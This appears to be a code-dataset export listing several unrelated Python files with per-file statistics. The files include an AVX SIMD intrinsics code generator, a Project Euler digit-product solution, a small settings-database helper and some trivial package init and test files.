lane_perm = mm256Permute2f128Pd(ld_dst, ld_dst, [0,0,0,0,1,0,0,0])
if dist == 1:
load_rep = mm256ShufflePd(lane_perm, blend_dst, [0,1,0,1])
elif dist == 2:
if len(dst_reg_pos) > 1:
load_rep = lane_perm
else:
load_rep = mm256Permute2f128Pd(blend_dst, blend_dst, [0,0,0,0,1,0,0,0])
elif dist == 3:
load_rep = mm256UnpackloPd(mm256SetzeroPd(), lane_perm)
return load_rep
else:
lane_perm = mm256Permute2f128Pd(ld_dst, ld_dst, [1,0,0,0,0,0,0,1])
if dist == -1:
load_rep = mm256ShufflePd(blend_dst, lane_perm, [0,1,0,1])
elif dist == -2:
if len(dst_reg_pos) > 1:
load_rep = lane_perm
else:
load_rep = mm256Permute2f128Pd(blend_dst, blend_dst, [1,0,0,0,0,0,0,1])
elif dist == -3:
load_rep = mm256UnpackhiPd(lane_perm, mm256SetzeroPd())
return load_rep
else:
src_dsts_map = self.src_dsts_map(src, dsts_by_line)
raise Exception('len(src_dsts_map) == 1: Cannot load-replace!')
def mm256BroadcastSs(self, src, repList):
sList = sorted(repList, key=lambda t: t[0], reverse=True)
dst = sList[0][1]
if dst.reglen == 8 and dst.mrmap == range(8):
at = src.pointer.getAt()
direct = 1 if src.pointer.getMat().size[1] > 1 else 0 # Temp solution
lane1, posInLane = at[direct] > 3, at[direct] % 4
immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
dupLane = mm256Permute2f128Ps(mm256LoaduPs(dst.pointer), mm256LoaduPs(dst.pointer), immBitList) # Dup the lane where we can find the value
return mm256ShufflePs(dupLane, dupLane, [posInLane]*4)
def mm256LoadGs(self, src, repList, bounds):
sList = sorted(repList, key=lambda t: t[0], reverse=True)
dst = sList[0][1]
if src.reglen == 8 and len(src.mrmap) == 1 and src.mrmap[0] == tuple(range(8)):
if dst.reglen == 8: # and dst.mrmap == range(8):
at = src.pointer.getAt()
direct = 1 if src.pointer.getMat().size[1] > 1 else 0 # Temp solution
lane1, posInLane = at[direct] > 3, at[direct] % 4
immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
dupLane = mm256Permute2f128Ps(mm256LoadGs(dst.pointer, dst.mrmap), mm256LoadGs(dst.pointer, dst.mrmap), immBitList) # Dup the lane where we can find the value
return mm256ShufflePs(dupLane, dupLane, [posInLane]*4)
else:
raise Exception('Cannot load-replace!')
else:
raise Exception('Cannot load-replace!')
class AVX(ISA):
def __init__(self, opts):
super(AVX, self).__init__()
self.name = "AVX"
fp_m256d = { 'type': '__m256d' }
fp_m256d['arith'] = [ mm256AddPd, mm256SubPd, mm256MulPd, mm256DivPd, mm256HaddPd ]
fp_m256d['load'] = [ mm256LoaduPd, mm256MaskloadPd, mm256BroadcastSd, mm256LoadGd, asm256LoaduPd ]
fp_m256d['misc'] = [ mm256Permute2f128Pd, mm256PermutePd, mm256ShufflePd, mm256UnpackloPd, mm256UnpackhiPd, mm256BlendPd ]
fp_m256d['set'] = [ mm256SetzeroPd, mm256Set1Pd ]
fp_m256d['move'] = [ ]
# fp_m256d['store'] = [ mm256StoreuPd, mm256MaskstorePd ]
fp_m256d['store'] = [ mm256StoreGd ]
fp_m256d['loader'] = _Dbl4Loader()
fp_m256d['nublac'] = _Dbl4BLAC()
fp_m256d['storer'] = _Dbl4Storer()
fp_m256d['loadreplacer'] = AVXLoadReplacer(opts)
fp_m256 = { 'type': '__m256' }
fp_m256['arith'] = [ mm256AddPs, mm256MulPs, mm256HaddPs ]
fp_m256['load'] = [ mm256LoaduPs, mm256MaskloadPs, mm256BroadcastSs, mm256LoadGs ]
fp_m256['misc'] = [ mm256Permute2f128Ps, mm256BlendPs, mm256ShufflePs, mm256UnpackloPs, mm256UnpackhiPs ]
fp_m256['set'] = [ mm256SetzeroPs ]
fp_m256['move'] = [ ]
# fp_m256['store'] = [ mm256StoreuPs, mm256MaskstorePs ]
fp_m256['store'] = [ mm256StoreGs ]
fp_m256['loader'] = _Flt8Loader()
fp_m256['nublac'] = _Flt8BLAC()
fp_m256['storer'] = _Flt8Storer()
fp_m256['loadreplacer'] = fp_m256d['loadreplacer']
self.types = { 'fp': { ('double', 4): fp_m256d, ('float', 8): fp_m256} }
self.add_func_defs = [ asm256LoaduPd, asm256StoreuPd ] | 52.596705 | 221 | 0.530491 | 21,662 | 172,412 | 4.164805 | 0.033099 | 0.017934 | 0.01503 | 0.010685 | 0.853255 | 0.826952 | 0.796715 | 0.766632 | 0.742158 | 0.71519 | 0 | 0.087296 | 0.307751 | 172,412 | 3,278 | 222 | 52.596705 | 0.668602 | 0.214968 | 0 | 0.680932 | 0 | 0 | 0.031527 | 0.001033 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115254 | false | 0 | 0.00339 | 0.048729 | 0.252966 | 0.033898 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a17be312a663870cdfc225b0ef2e52f5a13626d3 | 2,530 | py | Python | Project Euler/8_Largest_Product_in_series.py | Ashwanigupta9125/code-DS-ALGO | 49f6cf7d0c682da669db23619aef3f80697b352b | [
"MIT"
] | 36 | 2019-12-27T08:23:08.000Z | 2022-01-24T20:35:47.000Z | Project Euler/8_Largest_Product_in_series.py | Ashwanigupta9125/code-DS-ALGO | 49f6cf7d0c682da669db23619aef3f80697b352b | [
"MIT"
] | 10 | 2019-11-13T02:55:18.000Z | 2021-10-13T23:28:09.000Z | Project Euler/8_Largest_Product_in_series.py | Ashwanigupta9125/code-DS-ALGO | 49f6cf7d0c682da669db23619aef3f80697b352b | [
"MIT"
] | 53 | 2020-08-15T11:08:40.000Z | 2021-10-09T15:51:38.000Z | # The four adjacent digits in the 1000-digit number that have the greatest product
# are 9 × 9 × 8 × 9 = 5832.
# 73167176531330624919225119674426574742355349194934
# 96983520312774506326239578318016984801869478851843
# 85861560789112949495459501737958331952853208805511
# 12540698747158523863050715693290963295227443043557
# 66896648950445244523161731856403098711121722383113
# 62229893423380308135336276614282806444486645238749
# 30358907296290491560440772390713810515859307960866
# 70172427121883998797908792274921901699720888093776
# 65727333001053367881220235421809751254540594752243
# 52584907711670556013604839586446706324415722155397
# 53697817977846174064955149290862569321978468622482
# 83972241375657056057490261407972968652414535100474
# 82166370484403199890008895243450658541227588666881
# 16427171479924442928230863465674813919123162824586
# 17866458359124566529476545682848912883142607690042
# 24219022671055626321111109370544217506941658960408
# 07198403850962455444362981230987879927244284909188
# 84580156166097919133875499200524063689912560717606
# 05886116467109405077541002256983155200055935729725
# 71636269561882670428252483600823257530420752963450
# Find the thirteen adjacent digits in the 1000-digit number that have the greatest
# product. What is the value of this product?
import functools
target = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
digits = [int(i) for i in target]
highest = 0
for i in range(0, len(digits)-13):
test = functools.reduce((lambda x,y: x*y), digits[i:i+13] )
if test > highest:
highest = test
print(highest) | 64.871795 | 1,011 | 0.920553 | 105 | 2,530 | 22.209524 | 0.6 | 0.012007 | 0.013722 | 0.016295 | 0.051458 | 0.051458 | 0.051458 | 0.051458 | 0.051458 | 0.051458 | 0 | 0.843554 | 0.052569 | 2,530 | 39 | 1,012 | 64.871795 | 0.128077 | 0.495257 | 0 | 0 | 0 | 0 | 0.798085 | 0.798085 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.111111 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a17cc4ffec41cafa375795aa578c3274e9a6d5e1 | 461 | py | Python | client/database/get.py | EvlosCo/go-cli | 4818da63388cf00cca98ee69623bc4450c875804 | [
"MIT"
] | 1 | 2019-04-15T19:38:45.000Z | 2019-04-15T19:38:45.000Z | client/database/get.py | EvlosCo/go-cli | 4818da63388cf00cca98ee69623bc4450c875804 | [
"MIT"
] | null | null | null | client/database/get.py | EvlosCo/go-cli | 4818da63388cf00cca98ee69623bc4450c875804 | [
"MIT"
] | null | null | null | from database import models
from database import db
def get_server_url():
return db.session.query(models.Setting) \
.filter_by(setting_name='url').first().setting_value
def get_token_name():
return db.session.query(models.Setting) \
.filter_by(setting_name='token_name').first().setting_value
def get_token():
return db.session.query(models.Setting) \
.filter_by(setting_name='token').first().setting_value
| 25.611111 | 71 | 0.70282 | 62 | 461 | 4.983871 | 0.306452 | 0.058252 | 0.145631 | 0.194175 | 0.718447 | 0.718447 | 0.537217 | 0.537217 | 0.537217 | 0.537217 | 0 | 0 | 0.173536 | 461 | 17 | 72 | 27.117647 | 0.811024 | 0 | 0 | 0.272727 | 0 | 0 | 0.039046 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | true | 0 | 0.181818 | 0.272727 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
a1886a3d709d4b5030abaf3ec339234d4f5c5e43 | 30 | py | Python | tests/test.py | TheNewThinkTank/dark-matter-attractor | b27daa576faf291e45645aa5f40f5d49e8a1a96d | [
"MIT"
] | 1 | 2020-06-07T10:03:19.000Z | 2020-06-07T10:03:19.000Z | tests/test.py | TheNewThinkTank/dark-matter-attractor | b27daa576faf291e45645aa5f40f5d49e8a1a96d | [
"MIT"
] | null | null | null | tests/test.py | TheNewThinkTank/dark-matter-attractor | b27daa576faf291e45645aa5f40f5d49e8a1a96d | [
"MIT"
] | null | null | null |
def test_dummy():
pass
| 5 | 17 | 0.566667 | 4 | 30 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 30 | 5 | 18 | 6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
a1987244e68095d69870e8d90c11f939aa5b25fc | 504 | py | Python | clismo/compiler/__init__.py | jmorgadov/clismo | 1200a5115eef5b2e1801bd1768c78191220ae0e2 | [
"MIT"
] | 2 | 2022-02-19T22:11:30.000Z | 2022-02-23T18:22:56.000Z | clismo/compiler/__init__.py | jmorgadov/clismo | 1200a5115eef5b2e1801bd1768c78191220ae0e2 | [
"MIT"
] | null | null | null | clismo/compiler/__init__.py | jmorgadov/clismo | 1200a5115eef5b2e1801bd1768c78191220ae0e2 | [
"MIT"
] | null | null | null | from clismo.compiler.generic_ast import AST
from clismo.compiler.grammar import (Grammar, NonTerminal, Production, Symbol,
Terminal)
from clismo.compiler.parsers.parser import Parser
from clismo.compiler.parsers.lritem import LRItem
from clismo.compiler.parsers.lr1_parser import LR1Parser, LR1Table
from clismo.compiler.parser_manager import ParserManager
from clismo.compiler.terminal_set import TerminalSet
from clismo.compiler.tokenizer import Token, Tokenizer
| 42 | 78 | 0.793651 | 61 | 504 | 6.491803 | 0.377049 | 0.20202 | 0.363636 | 0.189394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007026 | 0.152778 | 504 | 11 | 79 | 45.818182 | 0.920375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.888889 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a19eb7a240ac3a9b6ca22da0bcdd4df0e09d537b | 84 | py | Python | app/dean/__init__.py | jqqqqqqqqqq/CourseCenter | 61e38b4f5e7a312023dd7c58a399f44d110f2b08 | [
"MIT"
] | null | null | null | app/dean/__init__.py | jqqqqqqqqqq/CourseCenter | 61e38b4f5e7a312023dd7c58a399f44d110f2b08 | [
"MIT"
] | null | null | null | app/dean/__init__.py | jqqqqqqqqqq/CourseCenter | 61e38b4f5e7a312023dd7c58a399f44d110f2b08 | [
"MIT"
] | null | null | null | from flask import Blueprint
dean = Blueprint('dean', __name__)
from . import views | 16.8 | 34 | 0.761905 | 11 | 84 | 5.454545 | 0.636364 | 0.433333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154762 | 84 | 5 | 35 | 16.8 | 0.84507 | 0 | 0 | 0 | 0 | 0 | 0.047059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
a1c17c3fb80473cc633bf571c3ca352f3084b809 | 89 | py | Python | core/utils/__init__.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | core/utils/__init__.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | core/utils/__init__.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | from .activation import *
from .cost import *
from .weights import *
from .tests import * | 22.25 | 25 | 0.741573 | 12 | 89 | 5.5 | 0.5 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168539 | 89 | 4 | 26 | 22.25 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a1e6aff5c732d17d561527aeffb0acaa2a8d1e8b | 76 | py | Python | gal_gen/__init__.py | andrevitorelli/TenGU | 539a39552bb18cc19dc941003e2a44d646da98e1 | [
"MIT"
] | 1 | 2021-03-19T15:36:48.000Z | 2021-03-19T15:36:48.000Z | gal_gen/__init__.py | andrevitorelli/TenGU | 539a39552bb18cc19dc941003e2a44d646da98e1 | [
"MIT"
] | null | null | null | gal_gen/__init__.py | andrevitorelli/TenGU | 539a39552bb18cc19dc941003e2a44d646da98e1 | [
"MIT"
] | null | null | null | """gal_gen dataset."""
from .gal_gen import GalGen
from .galaxies import *
| 15.2 | 27 | 0.723684 | 11 | 76 | 4.818182 | 0.636364 | 0.226415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144737 | 76 | 4 | 28 | 19 | 0.815385 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
629b6023fe7a67774d5a63070d46f302aeb06004 | 88 | py | Python | CodeWars/7 Kyu/Decreasing Inputs.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | CodeWars/7 Kyu/Decreasing Inputs.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | CodeWars/7 Kyu/Decreasing Inputs.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | def add(*args):
return round(sum(a / float(i) for i, a in enumerate(args, start=1))) | 44 | 72 | 0.647727 | 17 | 88 | 3.352941 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013699 | 0.170455 | 88 | 2 | 72 | 44 | 0.767123 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.